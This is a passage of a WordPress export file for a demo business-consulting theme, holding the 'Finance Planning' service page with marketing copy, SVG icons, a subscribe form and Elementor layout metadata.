:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1921]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2033]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/finance-planning/</link>
		<pubDate>Tue, 22 Sep 2020 02:55:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1002</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home3-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home3.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1002</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:55:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:55:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2784cf1","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"6b0b1f4","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6191f05","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"fa0c07e","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"508a439","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3808452","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2deb288","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"aed5597","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"18feed3","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"2687052","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0b9de86","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"75d682b","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"eb8a5b2","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"6315c9f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4d6ddf8","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#D92300","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8083fb5","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ddfb0e2","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8ca6f1a","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"3cf7ecd","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"fc883e9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"42bd250","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"2285a93","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"90b3f9e","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"0748676","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"02b4af2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home3.png","id":1701},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"153c642","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"17a1aa0","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #d92300;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"66d8a4c","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"01b2f8e","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"388d72b","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"54dd58d","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"70d0b23","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"402a70c","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"df6115d","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"88e18e0","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project 